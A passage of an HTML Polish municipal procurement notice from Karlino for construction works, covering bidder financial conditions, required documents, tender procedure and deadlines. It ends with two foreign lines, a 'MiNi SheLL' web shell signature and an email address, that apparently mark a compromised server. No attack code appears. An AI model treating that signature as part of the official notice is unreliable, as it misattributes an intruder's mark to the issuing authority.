Zamawiający, na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63 poz. 394), uzna obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe wymagane na ww. stanowiska, jeżeli kwalifikacje te swym zakresem będą odpowiadały uprawnieniom opisanym powyżej umożliwiając kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia
Przy analizie ofert pod względem spełniania warunków udziału w postępowaniu Zamawiający stosuje zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o realizację zamówienia: 
 (1)	powinien posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 1.200.000 zł (słownie: jeden milion dwieście tysięcy złotych); (warunek dot. zdolności finansowej), 
(2)	powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 1.200.000 zł (słownie: jeden milion dwieście  tysięcy złotych) (warunek dot. zdolności ekonomicznej). 
Przy analizie ofert pod względem spełniania warunków udziału w postępowaniu Zamawiający stosuje zasadę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do wykazu robót budowlanych należy dołączyć:1)	poświadczenie
2)	inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt 1;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony mogą zmienić istotne postanowienia umowy w sprawie zamówienia publicznego 
- w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, gdy możliwość wprowadzenia takich zmian została przewidziana przez Zamawiającego 
we wzorze umowy, stanowiącej załącznik nr 7 do niniejszej instrukcji dla wykonawców 
i na warunkach tam przewidzianych. Zmiana umowy nastąpi w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.karlino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bip.karlino.pl oraz w siedzibie Zamawiającego: Urząd Miejski w Karlinie Plac Jana Pawła II 6, 78-230 Karlino, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego: Urząd Miejski w Karlinie Plac Jana Pawła II 6, 78-230 Karlino, pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja realizowana w ramach projektu Działania infrastrukturalne na rzecz poprawy stanu środowiska w obiektach użyteczności publicznej na terenie dorzecza Parsęty dofinansowanego w ramach Szwajcarsko - Polskiego Programu Współpracy, KIK/48..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com